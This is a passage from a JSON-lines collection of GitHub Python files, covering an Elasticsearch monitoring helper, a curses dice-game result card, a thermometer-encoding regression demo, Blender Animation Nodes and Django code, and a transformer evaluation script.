{\n\t\t\t\t\t\t\t\"app_name\": self.app_name\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"range\": {\n\t\t\t\t\t\t\t\"request_time\": {\n\t\t\t\t\t\t\t\t\"from\": dt_begin.strftime('%Y-%m-%d %H:%M:%S'),\n\t\t\t\t\t\t\t\t\"to\": dt_end.strftime('%Y-%m-%d %H:%M:%S'),\n\t\t\t\t\t\t\t\t\"time_zone\": \"+08:00\"\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t]\n\t\t\t}\n\t\t}\n\n\t\tif self.method != \"\":\n\t\t\tbody[\"query\"][\"and\"].append({\n\t\t\t\t\"term\": {\n\t\t\t\t\t\"call_method\": self.method\n\t\t\t\t}\n\t\t\t})\n\t\tif self.app_ip != \"\":\n\t\t\tbody[\"query\"][\"and\"].append({\n\t\t\t\t\"term\": {\n\t\t\t\t\t\"server_ip\": self.app_ip\n\t\t\t\t}\n\t\t\t})\n\n\t\tif self.http_method != \"\":\n\t\t\tbody[\"query\"][\"and\"].append({\n\t\t\t\t\"term\": {\n\t\t\t\t\t\"method\": self.http_method\n\t\t\t\t}\n\t\t\t})\n\n\t\tif self.http_url != \"\":\n\t\t\tbody[\"query\"][\"and\"].append({\n\t\t\t\t\"prefix\": {\n\t\t\t\t\t\"url\": self.http_url\n\t\t\t\t}\n\t\t\t})\n\t\t# print(body)\n\t\treturn body\n\n\tdef filter_error_data(self, avg_all, ary_pre):\n\t\tavg_total = 0\n\t\tavg_num = len(ary_pre)\n\t\tavg_rtn = avg_all\n\t\tif avg_num > 0:\n\t\t\t# 需要去除历史异常的数据,如:超量过高请求\n\t\t\tfor obj in ary_pre:\n\t\t\t\tavg_total += obj[\"average\"]\n\t\t\tavg_rtn = avg_total / float(avg_num)\n\n\t\t\t# 去除历史数据中的异常数据,取正常平均值\n\t\t\tfilter_percent = 0.9\n\t\t\tif avg_rtn > 5:\n\t\t\t\tfilter_percent = 1 / math.log2(avg_rtn)\n\t\t\tfilter_max = avg_rtn * (1 + filter_percent)\n\t\t\tfilter_min = avg_rtn * (1 - filter_percent)\n\t\t\tLogger.debug(\n\t\t\t\t\"total array average={:.2f}, filter_percent={:.2f} total number={}, filter_max={:.2f}, filter_min={:.2f}\"\n\t\t\t\t.format(avg_rtn, filter_percent, avg_num, filter_max, filter_min))\n\n\t\t\tary_min = []\n\t\t\tary_max = []\n\t\t\tary_mid = []\n\t\t\tfor obj in ary_pre:\n\t\t\t\tval = obj[\"average\"]\n\t\t\t\tLogger.debug(\"curr value:{:.2f}, max:{:.2f}, min:{:.2f}\".format(val, filter_max, filter_min))\n\t\t\t\tif val > filter_max:\n\t\t\t\t\tary_max.append(val)\n\t\t\t\t\tLogger.debug(\"ary_max push:{:.2f}\".format(val))\n\t\t\t\telif val < 
filter_min:\n\t\t\t\t\tary_min.append(val)\n\t\t\t\t\tLogger.debug(\"ary_min push:{:.2f}\".format(val))\n\t\t\t\telse:\n\t\t\t\t\tary_mid.append(val)\n\n\t\t\tavg_max = len(ary_max)\n\t\t\tavg_min = len(ary_min)\n\t\t\tavg_mid = len(ary_mid)\n\t\t\tLogger.debug(\"average range number:{}, overflow up number:{}, overflow down number:{}\"\n\t\t\t .format(avg_mid, avg_max, avg_min))\n\n\t\t\tif avg_mid != avg_num:\n\t\t\t\tif avg_mid > 0 and (avg_mid >= avg_max or avg_mid >= avg_min):\n\t\t\t\t\tavg_rtn = mean(ary_mid)\n\t\t\t\t\tLogger.debug(\"process average data, length:{:.2f}, average:{}\".format(avg_rtn, avg_mid))\n\t\t\t\telse:\n\t\t\t\t\tif avg_max > avg_min:\n\t\t\t\t\t\tavg_rtn = mean(ary_max)\n\t\t\t\t\t\tLogger.debug(\"process overflow data, length:{:.2f}, average:{}\".format(avg_rtn, avg_max))\n\t\t\t\t\telse:\n\t\t\t\t\t\tavg_rtn = mean(ary_min)\n\t\t\t\t\t\tLogger.debug(\"process lower data, length:{:.2f}, average:{}\".format(avg_rtn, avg_min))\n\t\treturn avg_rtn\n\n\ndef get_class(kls):\n\tparts = kls.split('.')\n\tmodule = \".\".join(parts[:-1])\n\tcall_model = __import__(module)\n\tfor comp in parts[1:]:\n\t\tcall_model = getattr(call_model, comp)\n\treturn call_model\n\n\ndef run_app(class_name, usage):\n\tLogger.init()\n\tLogger.set_debug(False)\n\topts, args = getopt.getopt(sys.argv[1:], \"hda:m:w:e:t:n:s:c:i:g:o:u:\")\n\t_index_name = \"quality_log\"\n\t_app_ip = \"\"\n\t_app_name = \"\"\n\t_method = \"\"\n\t_warn_rate = 0\n\t_error_rate = 0\n\t_sample_time = 0\n\t_sample_num = 0\n\t_check_type = \"\"\n\t_hosts = ['192.168.30.65', '192.168.30.66', '192.168.30.67']\n\t_debug_time = None\n\t_http_method = \"\"\n\t_http_url = \"\"\n\tfor op, value in opts:\n\t\tif op == \"-w\":\n\t\t\t_warn_rate = float(value)\n\t\telif op == \"-i\":\n\t\t\t_app_ip = value\n\t\telif op == \"-a\":\n\t\t\t_app_name = value\n\t\telif op == \"-m\":\n\t\t\t_method = value\n\t\telif op == \"-c\":\n\t\t\t_check_type = value\n\t\telif op == \"-e\":\n\t\t\t_error_rate = float(value)\n\t\telif op == \"-t\":\n\t\t\t_sample_time = int(value)\n\t\telif op == \"-n\":\n\t\t\t_sample_num = int(value)\n\t\telif op == \"-s\":\n\t\t\t_hosts = value.split(',')\n\t\telif op == \"-d\":\n\t\t\tLogger.set_debug(True)\n\t\telif op == \"-g\":\n\t\t\t_debug_time = datetime.datetime.strptime(value, '%Y-%m-%d %H:%M:%S')\n\t\telif op == \"-u\":\n\t\t\t_http_url = value\n\t\telif op == \"-o\":\n\t\t\t_http_method = value\n\t\telif op == \"-h\":\n\t\t\tusage()\n\t\t\tsys.exit(2)\n\n\tclass_attr = get_class(class_name)\n\tm = class_attr(app_name=_app_name, method=_method, warn_rate=_warn_rate, error_rate=_error_rate,\n\t sample_time=_sample_time, sample_num=_sample_num, index_name=_index_name,\n\t check_type=_check_type, app_ip=_app_ip, hosts=_hosts, debug_time=_debug_time,\n\t http_url=_http_url, http_method=_http_method)\n\trtn = m.run()\n\tLogger.debug(\"check return is:{}\".format(rtn))\n\treturn rtn\n\n\nif __name__ == \"__main__\":\n\tm = get_class(\"check_throughput.CheckTP\")\n\tprint(m)\n","repo_name":"mendylee/quality-monitor","sub_path":"es_helper/check_base.py","file_name":"check_base.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41078139315","text":"\"\"\"\nThis modul contains the needed functionality for rendering a game-card into a window\n\"\"\"\nimport curses\nfrom typing import List\n\nfrom kniffel.windows.game_window import players_card\n\nfrom kniffel import common\nfrom 
kniffel.data_objects.point import Point\n\n\nclass ResultCard:\n \"\"\"\n The ResultCard takes in a window it will render a result card\n \"\"\"\n\n def __init__(self, window: curses.window):\n self.__window = window\n\n @staticmethod\n def get_required_size():\n \"\"\"\n Return height and width needed for rendering a result card\n @return height, width\n \"\"\"\n return len(common.RESULT_PAD), len(common.RESULT_PAD[0])\n\n @staticmethod\n def get_control_string() -> str:\n \"\"\"\n Returns the control-string with all available controls for the result card\n \"\"\"\n return common.LABEL_CONTROL_DESCRIPTION_RESULT_CARD\n\n def render(self, points: List[List[Point]]):\n \"\"\"\n Renders the passed List[List[Point]] to the window passed in the constructor\n @param points: List[List[Point]] which is rendered\n \"\"\"\n self.__window.clear()\n\n max_y, max_x = self.__window.getmaxyx()\n x_off = (max_x - len(common.RESULT_PAD[0])) // 2\n y_off = (max_y - len(common.RESULT_PAD)) // 2\n\n # Print header pad\n players_card.draw_header(self.__window, y_off, x_off)\n\n # Print result card\n count = 0\n for line in common.RESULT_PAD:\n self.__window.addstr(\n count + y_off + len(common.NAME_PAD),\n x_off, line, curses.color_pair(\n common.COLOR_PAIR_BLACK_WHITE))\n count += 1\n\n count = 0\n for column in points:\n y_off_column = y_off + len(common.NAME_PAD) + 1\n x_off_column = x_off + len(common.RESULT_PAD[1]) + count * 6\n self.__window.move(y_off_column, x_off_column)\n self.__render_column(column)\n count += 1\n\n self.__window.refresh()\n\n def __render_column(self, column: List[Point]):\n \"\"\"\n Draws column at the current curser-position on the window\n @param column: column which is rendered\n \"\"\"\n y_off, x_off = self.__window.getyx()\n result_points = [0, 0, 0, 0]\n top_points = range(0, 6)\n all_top_points = range(0, 13)\n\n index: int = 0\n for point in column:\n if index in top_points:\n result_points[0] += point.value\n if result_points[0] >= 63:\n result_points[1] = 35\n if index in all_top_points:\n result_points[2] += point.value\n result_points[3] = result_points[1] + result_points[2]\n index += 1\n\n count: int = 0\n color=curses.color_pair(common.COLOR_PAIR_BLACK_WHITE)\n for result_card_line in common.RESULT_POINTS_PAD:\n if count % 2 == 0:\n index = count // 2\n point = result_points[index]\n\n str_to_add = result_card_line.format(point).center(5)\n\n self.__window.addstr(\n y_off + count,\n x_off,\n str_to_add.center(5),\n color)\n else:\n str_to_add = result_card_line\n self.__window.addstr(\n y_off + count,\n x_off,\n str_to_add,\n color\n )\n\n count += 1\n\n self.__window.addstr(\n \"!\",color)\n\n self.__window.refresh()\n","repo_name":"SaiCode-DEV/Python-Kniffel","sub_path":"kniffel/windows/game_window/result_card.py","file_name":"result_card.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39160440936","text":"from sklearn.linear_model import LinearRegression\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n \n\ndef thermometer(x, start, end):\n thresholds = np.arange(start, end)\n thermo = (x > thresholds).astype(float)\n thermo[np.arange(len(x)),\n (np.floor((x - start))).astype(int).reshape(len(x))\n ] = np.fmod(x, 1.0).reshape(len(x))\n return thermo\n\nX = np.random.uniform(0, 10, size=(50, 1))\nX = np.sort(X, axis=0)\nX_val = np.random.uniform(0, 10, size=(50, 1))\nX_val = np.sort(X_val, axis=0)\n\nX_thermo = thermometer(X, 0, 
10)\nX_thermo_val = thermometer(X_val, 0, 10)\n\ny = np.square(X) + 5.0\ny_val = np.square(X_val) + 5.0\n\nlr = LinearRegression()\nlr.fit(X, y)\nprint(lr.score(X_val, y_val))\n\nlr2 = LinearRegression()\nlr2.fit(X_thermo, y)\nprint(lr2.score(X_thermo_val, y_val))\n\nplt.plot(X_val, lr.predict(X_val), label='Raw Feature')\nplt.plot(X_val, lr2.predict(X_thermo_val),label='Thermometer Encoding')\nplt.plot(X_val, y_val,'ro', label='Ground Truth')\nplt.legend()\nplt.savefig('../figures/thermo.pdf')","repo_name":"common-ai/ml-guide","sub_path":"src/thermometer.py","file_name":"thermometer.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"37248316382","text":"from django.urls import path\n\nfrom .views import (\n ReceiveList, ReceiveCreate, ReceiveUpdate, ReceiveDelete, ReceiveSearch,\n OrganizationList, OrganizationCreate, OrganizationUpdate, OrganizationDelete,\n PaymentList, PaymentCreate, PaymentUpdate, PaymentDelete, PaymentSearch,\n ActivityList, ActivityCreate, ActivityUpdate, ActivityDelete, ActivitySearch\n)\n\n\napp_name = \"government_accounts\"\n\nurlpatterns = [\n path('receives/', ReceiveList.as_view(), name=\"receives\"),\n path('receives/page/<int:page>', ReceiveList.as_view(), name=\"receives\"),\n path('receives/search', ReceiveSearch.as_view(), name=\"receives_search\"),\n path('receives/search/page/<int:page>', ReceiveSearch.as_view(), name=\"receives_search\"),\n path('receives/create', ReceiveCreate.as_view(), name=\"receive_create\"),\n path('receives/update/<int:pk>', ReceiveUpdate.as_view(), name=\"receive_update\"),\n path('receives/delete/<int:pk>', ReceiveDelete.as_view(), name=\"receive_delete\"),\n \n path('organizations/', OrganizationList.as_view(), name=\"organizations\"),\n path('organizations/create', OrganizationCreate.as_view(), name=\"organization_create\"),\n path('organizations/update/<int:pk>', OrganizationUpdate.as_view(), name=\"organization_update\"),\n path('organizations/delete/<int:pk>', OrganizationDelete.as_view(), name=\"organization_delete\"),\n\n path('payments/', PaymentList.as_view(), name=\"payments\"),\n path('payments/page/<int:page>', PaymentList.as_view(), name=\"payments\"),\n path('payments/search', PaymentSearch.as_view(), name=\"payments_search\"),\n path('payments/search/page/<int:page>', PaymentSearch.as_view(), name=\"payments_search\"),\n path('payments/create', PaymentCreate.as_view(), name=\"payment_create\"),\n path('payments/update/<int:pk>', PaymentUpdate.as_view(), name=\"payment_update\"),\n path('payments/delete/<int:pk>', PaymentDelete.as_view(), name=\"payment_delete\"),\n\n path('activities/', ActivityList.as_view(), name=\"activities\"),\n path('activities/page/<int:page>', ActivityList.as_view(), name=\"activities\"),\n path('activities/search', ActivitySearch.as_view(), name=\"activities_search\"),\n path('activities/search/page/<int:page>', ActivitySearch.as_view(), name=\"activities_search\"),\n path('activities/create', ActivityCreate.as_view(), name=\"activity_create\"),\n path('activities/update/<int:pk>', ActivityUpdate.as_view(), name=\"activity_update\"),\n path('activities/delete/<int:pk>', ActivityDelete.as_view(), name=\"activity_delete\"),\n]\n","repo_name":"EhsanGh69/paydar_projects","sub_path":"government_accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} 
+{"seq_id":"35509083431","text":"import bpy\nfrom ... base_types.template import Template\n\nclass FCurveAnimationOffsetTemplate(bpy.types.Operator, Template):\n bl_idname = \"an.fcurve_animation_offset_template\"\n bl_label = \"FCurve Animation Offset\"\n nodeOffset = (-500, 200)\n\n def insert(self):\n\n # Nodes\n ####################################################################\n\n # Main Unit\n sourceObjectNode = self.newNode('an_DataInputNode', x = 0, y = 0, label = 'Source Object')\n sourceObjectNode.assignedType = 'Object'\n\n timeInfoNode = self.newNode('an_TimeInfoNode', x = 0, y = -200)\n additionalOffsetNode = self.newNode('an_TranslationMatrixNode', x = 0, y = -325)\n additionalOffsetNode.inputs[0].value = [4, 3, 0]\n individualOffsetNode = self.newNode('an_ComposeMatrixNode', x = 220, y = -325)\n individualOffsetNode.inputs[0].value = [3, 0, 0]\n delayTimeNode = self.newNode('an_DelayTimeNode', x = 220, y = -200)\n objectInstancer = self.newNode('an_ObjectInstancerNode', x = 220, y = 150)\n objectInstancer.copyObjectProperties = True\n objectInstancer.removeAnimationData = True\n objectInstancer.inputs[0].value = 5\n invokeAnimationOffsetNode = self.newNode('an_InvokeSubprogramNode', x = 500, y = -80)\n\n # Animation Offset Group\n\n animationOffsetGroupInputNode = self.newNode('an_GroupInputNode', x = 0, y = -845)\n animationOffsetGroupInputNode.subprogramName = \"FCurve Animation Offset\"\n animationOffsetGroupInputNode.newParameter('Object', name = 'Source')\n animationOffsetGroupInputNode.newParameter('Object List', name = 'Targets')\n animationOffsetGroupInputNode.newParameter('Float', name = 'Frame')\n animationOffsetGroupInputNode.newParameter('Float', name = 'Time Offset').value = 10\n animationOffsetGroupInputNode.newParameter('Matrix', name = 'Additional Offset')\n animationOffsetGroupInputNode.newParameter('Matrix', name = 'Individual Offset')\n\n fCurvesFromObjectNode = self.newNode('an_FCurvesFromObjectNode', x = 250, y = -775)\n invokeObjectLoopNode = self.newNode('an_InvokeSubprogramNode', x = 470, y = -745)\n\n animationOffsetGroupOutputNode = self.newNode('an_GroupOutputNode', x = 700, y = -745)\n animationOffsetGroupOutputNode.newReturn('Object List', name = 'Targets')\n\n # Object Loop\n\n objectLoopInputNode = self.newNode('an_LoopInputNode', x = 0, y = -1300)\n objectLoopInputNode.subprogramName = \"Object Loop\"\n objectLoopInputNode.newIterator('Object List', name = 'Target').loop.useAsOutput = True\n objectLoopInputNode.newParameter('Object', name = 'Source')\n objectLoopInputNode.newParameter('FCurve List', name = 'FCurve List')\n objectLoopInputNode.newParameter('Float', name = 'Frame')\n objectLoopInputNode.newParameter('Float', name = 'Time Offset')\n objectLoopInputNode.newParameter('Matrix', name = 'Additional Offset')\n objectLoopInputNode.newParameter('Matrix', name = 'Individual Offset')\n accumulatedTransformationSocket = objectLoopInputNode.newParameter('Matrix', name = 'Accumulated Transformation')\n accumulatedTransformationSocket.loop.useAsInput = False\n\n multiplyIndexAndOffsetNode = self.newNode('an_FloatMathNode', x = 350, y = -1200)\n subtractOffsetFromFrameNode = self.newNode('an_FloatMathNode', x = 550, y = -1200)\n subtractOffsetFromFrameNode.operation = \"SUBTRACT\"\n calculateAccumulatedMatrixNode = self.newNode('an_MatrixMathNode', x = 350, y = -1580)\n reassignAccumulatedMatrixNode = self.newNode('an_ReassignLoopParameterNode', x = 540, y = -1580)\n copyTransformsNode = self.newNode('an_CopyTransformsNode', x = 550, y = 
-1340)\n copyTransformsNode.width = 140\n invokeCopyFCurvesNode = self.newNode('an_InvokeSubprogramNode', x = 760, y = -1200)\n updateMatrixNode = self.newNode('an_UpdateObjectMatricesNode', x = 1030, y = -1330)\n localTransformNode = self.newNode('an_TransformObjectNode', x = 1230, y = -1370)\n localTransformNode.useCenter = True\n additionalTransformNode = self.newNode('an_TransformObjectNode', x = 1450, y = -1415)\n additionalTransformNode.useCenter = False\n\n # Copy FCurves Loop\n\n copyFCurvesLoopInput = self.newNode('an_LoopInputNode', x = 0, y = -1850)\n copyFCurvesLoopInput.subprogramName = \"Copy FCurves\"\n copyFCurvesLoopInput.newIterator('FCurve List', name = 'FCurve')\n copyFCurvesLoopInput.newParameter('Object', name = 'Object').loop.useAsOutput = True\n copyFCurvesLoopInput.newParameter('Float', name = 'Frame Offset')\n\n fCurveInfoNode = self.newNode('an_FCurveInfoNode', x = 300, y = -1850)\n evaluateFCurveNode = self.newNode('an_EvaluateFCurveNode', x = 300, y = -2000)\n evaluateFCurveNode.frameType = \"ABSOLUTE\"\n objectDataPathOutputNode = self.newNode('an_ObjectDataPathOutputNode', x = 550, y = -1910)\n\n self.updateSubprograms()\n\n invokeAnimationOffsetNode.subprogramIdentifier = animationOffsetGroupInputNode.identifier\n animationOffsetGroupOutputNode.groupInputIdentifier = animationOffsetGroupInputNode.identifier\n invokeObjectLoopNode.subprogramIdentifier = objectLoopInputNode.identifier\n reassignAccumulatedMatrixNode.loopInputIdentifier = objectLoopInputNode.identifier\n reassignAccumulatedMatrixNode.parameterIdentifier = accumulatedTransformationSocket.identifier\n invokeCopyFCurvesNode.subprogramIdentifier = copyFCurvesLoopInput.identifier\n\n self.updateSubprograms()\n\n\n # Links\n ####################################################################\n\n # Main Unit\n\n self.newLink(sourceObjectNode.outputs[0], objectInstancer.inputs[1])\n self.newLink(timeInfoNode.outputs[0], delayTimeNode.inputs[0])\n self.newLink(sourceObjectNode.outputs[0], invokeAnimationOffsetNode.inputs[0])\n self.newLink(objectInstancer.outputs[0], invokeAnimationOffsetNode.inputs[1])\n self.newLink(delayTimeNode.outputs[0], invokeAnimationOffsetNode.inputs[2])\n self.newLink(additionalOffsetNode.outputs[0], invokeAnimationOffsetNode.inputs[4])\n self.newLink(individualOffsetNode.outputs[0], invokeAnimationOffsetNode.inputs[5])\n\n # Animation Offset Group\n\n self.newLink(animationOffsetGroupInputNode.outputs[0], fCurvesFromObjectNode.inputs[0])\n self.newLink(animationOffsetGroupInputNode.outputs[0], invokeObjectLoopNode.inputs[1])\n self.newLink(animationOffsetGroupInputNode.outputs[1], invokeObjectLoopNode.inputs[0])\n self.newLink(animationOffsetGroupInputNode.outputs[2], invokeObjectLoopNode.inputs[3])\n self.newLink(animationOffsetGroupInputNode.outputs[3], invokeObjectLoopNode.inputs[4])\n self.newLink(animationOffsetGroupInputNode.outputs[4], invokeObjectLoopNode.inputs[5])\n self.newLink(animationOffsetGroupInputNode.outputs[5], invokeObjectLoopNode.inputs[6])\n self.newLink(fCurvesFromObjectNode.outputs[0], invokeObjectLoopNode.inputs[2])\n self.newLink(invokeObjectLoopNode.outputs[0], animationOffsetGroupOutputNode.inputs[0])\n\n # Object Loop\n\n self.newLink(objectLoopInputNode.outputs[0], multiplyIndexAndOffsetNode.inputs[0])\n self.newLink(objectLoopInputNode.outputs[2], copyTransformsNode.inputs[1])\n self.newLink(objectLoopInputNode.outputs[4], copyTransformsNode.inputs[0])\n self.newLink(objectLoopInputNode.outputs[5], invokeCopyFCurvesNode.inputs[0])\n 
self.newLink(objectLoopInputNode.outputs[6], subtractOffsetFromFrameNode.inputs[0])\n self.newLink(objectLoopInputNode.outputs[7], multiplyIndexAndOffsetNode.inputs[1])\n self.newLink(objectLoopInputNode.outputs[8], additionalTransformNode.inputs[1])\n self.newLink(objectLoopInputNode.outputs[9], calculateAccumulatedMatrixNode.inputs[0])\n self.newLink(objectLoopInputNode.outputs[10], calculateAccumulatedMatrixNode.inputs[1])\n self.newLink(objectLoopInputNode.outputs[10], localTransformNode.inputs[1])\n self.newLink(multiplyIndexAndOffsetNode.outputs[0], subtractOffsetFromFrameNode.inputs[1])\n self.newLink(subtractOffsetFromFrameNode.outputs[0], invokeCopyFCurvesNode.inputs[2])\n self.newLink(calculateAccumulatedMatrixNode.outputs[0], reassignAccumulatedMatrixNode.inputs[0])\n self.newLink(copyTransformsNode.outputs[0], invokeCopyFCurvesNode.inputs[1])\n self.newLink(invokeCopyFCurvesNode.outputs[0], updateMatrixNode.inputs[0])\n self.newLink(updateMatrixNode.outputs[0], localTransformNode.inputs[0])\n self.newLink(localTransformNode.outputs[0], additionalTransformNode.inputs[0])\n\n # Copy FCurves Loop\n\n self.newLink(copyFCurvesLoopInput.outputs[2], evaluateFCurveNode.inputs[0])\n self.newLink(copyFCurvesLoopInput.outputs[2], fCurveInfoNode.inputs[0])\n self.newLink(copyFCurvesLoopInput.outputs[4], objectDataPathOutputNode.inputs[0])\n self.newLink(copyFCurvesLoopInput.outputs[5], evaluateFCurveNode.inputs[1])\n self.newLink(fCurveInfoNode.outputs[0], objectDataPathOutputNode.inputs[1])\n self.newLink(fCurveInfoNode.outputs[1], objectDataPathOutputNode.inputs[2])\n self.newLink(evaluateFCurveNode.outputs[0], objectDataPathOutputNode.inputs[3])\n","repo_name":"chrisatbest/animation_nodes","sub_path":"templates/animation/fcurve_animation_offset.py","file_name":"fcurve_animation_offset.py","file_ext":"py","file_size_in_byte":9409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"72666529211","text":"\r\noptions=int(input(\"Enter 1.Money Withdraw 2.Money depoit: \"))\r\ntotal_amount=0\r\nwhile options==1:\r\n pin=int(input(\"please enter the pin number: \"))\r\n if pin==1234:\r\n amount=int(input(\"enter the amount you want to deposit: \"))\r\n total_amount+=amount\r\n print(total_amount)\r\n elif(pin==123):\r\n amount=int(input(\"Enter the amonut you want to withdraw: \"))\r\n total_amount-=amount\r\n print(total_amount)\r\n\r\n\r\n","repo_name":"Bhavin6500/python-code","sub_path":"dict tuple list.py","file_name":"dict tuple list.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74006106172","text":"import torch\nimport numpy as np\nimport argparse\nimport utils\nimport yaml\n\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification, TrainingArguments, Trainer, EvalPrediction\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom datasets import load_dataset\n\nparser = argparse.ArgumentParser(description=\"path to test_data.csv\")\nparser.add_argument(\"-p\", \"--path\", help=\"Path\")\nargs = parser.parse_args()\n\ndef load_config(config_path):\n with open(config_path) as file:\n config = yaml.safe_load(file)\n\n return config\n\n\nconfig = load_config(\"./train_config.yaml\")\n\ndataset = load_dataset('csv', data_files={'test': args.path})\n\ntokenizer = AutoTokenizer.from_pretrained(config[\"model_save_path\"])\n\n\ndef preprocess_data(examples):\n text = examples[\"transcription\"]\n encoding = 
tokenizer(text, padding=\"max_length\", truncation=True, max_length=config[\"max_length\"])\n action = examples[\"action\"]\n obj = examples[\"object\"]\n location = examples[\"location\"]\n labels_matrix = np.zeros((len(text), len(config[\"labels\"])))\n for index, i, j, k in zip(range(len(text)), action, obj, location):\n for i in utils.get_id(i, j, k, config):\n labels_matrix[index][i] = 1\n\n encoding[\"labels\"] = labels_matrix.tolist()\n\n return encoding\n\n\nencoded_dataset = dataset.map(preprocess_data, batched=True, remove_columns=dataset['test'].column_names)\nencoded_dataset.set_format(\"torch\")\n\nmodel = AutoModelForSequenceClassification.from_pretrained(config[\"model_save_path\"],\n problem_type=config[\"problem_type\"],\n num_labels=len(config[\"labels\"]),\n id2label=config[\"id2label\"],\n label2id=config[\"label2id\"])\n\nargs = TrainingArguments(\n output_dir=config[\"model_save_path\"],\n evaluation_strategy=\"epoch\",\n save_strategy=\"epoch\",\n learning_rate=2e-5,\n per_device_train_batch_size=16,\n per_device_eval_batch_size=config[\"test_batch_size\"],\n num_train_epochs=config[\"num_train_epochs\"],\n weight_decay=config[\"weight_decay\"],\n metric_for_best_model=config[\"metric\"],\n)\n\n\ndef multi_label_metrics(predictions, labels):\n sigmoid = torch.nn.Sigmoid()\n probs = sigmoid(torch.Tensor(predictions))\n y_pred = []\n for prob in probs:\n y_pred_sample = np.zeros(prob.shape)\n for i in utils.get_out_labels(prob):\n y_pred_sample[i] = 1\n y_pred.append(y_pred_sample.tolist())\n y_true = labels\n f1_micro_average = f1_score(y_true=y_true, y_pred=y_pred, average='micro')\n accuracy = accuracy_score(y_true, y_pred)\n metrics = {'f1': f1_micro_average,\n 'accuracy': accuracy}\n return metrics\n\ndef compute_metrics(p: EvalPrediction):\n preds = p.predictions[0] if isinstance(p.predictions,\n tuple) else p.predictions\n print(f\"len of preds = {len(preds)}\")\n result = multi_label_metrics(\n predictions=preds,\n labels=p.label_ids)\n return result\n\ntrainer = Trainer(\n model,\n args,\n eval_dataset=encoded_dataset[\"test\"],\n tokenizer=tokenizer,\n compute_metrics=compute_metrics\n)\n\nprint(trainer.evaluate())","repo_name":"dineshggaonkar/LabelExtraction","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18908165313","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import Question, Choice\nfrom django.urls import reverse\nfrom django.template import loader\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views import generic # 从数据库中取数据前台渲染列表的操作比较简单,重复,Django封装了一个过程并提供统一的模板\nfrom django.http import Http404\n\n# Create your views here.\n\n\n# def index(request):\n# \"\"\"\n# 展示问题列表\n# :param request:\n# :return:\n# \"\"\"\n# question_list = Question.objects.all().order_by('-pub_date')[0:5]\n# # print(question_list)\n# # output = ''\n# # for q in question_list:\n# # print(q.id, q.question_text, q.pub_date)\n# # output = output + q.question_text + ','\n# # print(output)\n# # 下面一行列表生成式代替上面四五行\n# # output = ','.join([q.question_text for q in question_list])\n# template = loader.get_template('polls/index.html')\n# context = {\n# 'question_list': question_list\n# }\n# return HttpResponse(template.render(context, request))\n\n\ndef index(request):\n question_list = Question.objects.order_by('-pub_date')[:5]\n context = {\n 
'question_list': question_list\n }\n return render(request, 'polls/index.html', context)\n\n\ndef detail(request, question_id):\n \"\"\"\n 显示一个问题的详细信息,问题内容,问题发布时间,选项内容,每个选项投票数\n :param request:\n :param question_id:\n :return:\n \"\"\"\n \"\"\"\n # 写法一\n try:\n question = Question.objects.filter(id=question_id)\n except Question.DoesNotExist:\n raise Http404(\"404,此id的问题不存在\")\n print(question)\n context = {\n 'question': question\n }\n # 写法二\n # question = Question.objects.filter(id=question_id)\n # if not question:\n # raise Http404()\n return render(request, 'polls/detail.html', context)\n \"\"\"\n\n # 写法三\n question = get_object_or_404(Question, id=question_id)\n # 由于orm代劳,question直接带出对应的choices\n # choices = question.choice_set.all()\n # 由于前端模板语言本质是后端代码,可以把上一句放在html中写,有助于降低后端复杂度\n # choices = Choice.objects.filter(question_id=question.id)\n context = {\n 'question': question\n }\n return render(request, 'polls/detail.html', context)\n\n\ndef results(request, question_id):\n \"\"\"\n 投票结果\n :param request:\n :param question_id:\n :return:\n \"\"\"\n question = Question.objects.get(id=question_id)\n context = {\n 'question': question,\n }\n\n return render(request, 'polls/results.html', context)\n\n\ndef vote(request, question_id):\n \"\"\"\n 投票\n :param request:\n :param question_id:\n :return:\n \"\"\"\n try:\n question = Question.objects.get(id=question_id)\n choices = question.choice_set.all()\n choice_id = request.POST['choice']\n selected_choice = question.choice_set.get(id=choice_id)\n except Question.DoesNotExist as e:\n error_message = '问题内容不存在,请检查问题id'\n except Choice.DoesNotExist as e:\n error_message = '问题对应的选项不存在'\n return render(request, 'polls/detail.html', context={\n 'question': question,\n 'error_message': error_message\n })\n else:\n # sql update choice set votes=votes+1 where id=2\n selected_choice.votes += 1\n selected_choice.save()\n # 投票完重定向到 views.results(qid)\n return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))\n\n\n# 通用模板示例,跟def index 类比着看,比较适合单调的增删查改\nclass SimpleView(generic.ListView):\n template_name = 'polls/index.html '\n context_object_name = 'question_list'\n\n def get_queryset(self):\n return Question.objects.all()\n\n\n\n\n","repo_name":"qiaoqiao520/mysite","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"33525625313","text":"from django.conf.urls import patterns, url, include\nfrom task_list import views\n\nurlpatterns = patterns(\"\",\n url(r\"^/?$\", views.task_list, name=\"task_list\"),\n url(r\"^register/$\", views.register_user, name=\"register_user\"),\n url(r\"^login/$\", 